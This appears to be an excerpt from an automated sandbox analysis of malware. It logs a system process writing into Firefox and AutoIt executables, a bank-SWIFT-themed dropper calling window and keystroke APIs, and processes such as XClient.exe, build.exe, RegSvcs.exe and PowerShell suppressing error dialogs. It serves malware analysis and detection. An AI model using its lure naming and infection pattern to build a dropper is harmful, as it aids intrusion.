Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 121980	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\crashreporter.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 707072	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 1280512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 346881	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 666112	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239628	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 1239552	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 193089	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\firefox.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 228352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801868	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 801792	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 43297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 762368	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335884	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 1335808	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 239297	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 70144	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643660	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 643584	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 32241	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\pingsender.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 279040	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852556	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 852480	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 111633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\plugin-container.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 55296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 628736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 4108	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\private_browsing.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 403968	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977484	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 977408	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 79009	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Mozilla Firefox\updater.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 224256	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797772	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 797696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 35826	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files (x86)\AutoIt3\Au3Check.exe offset: 0	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
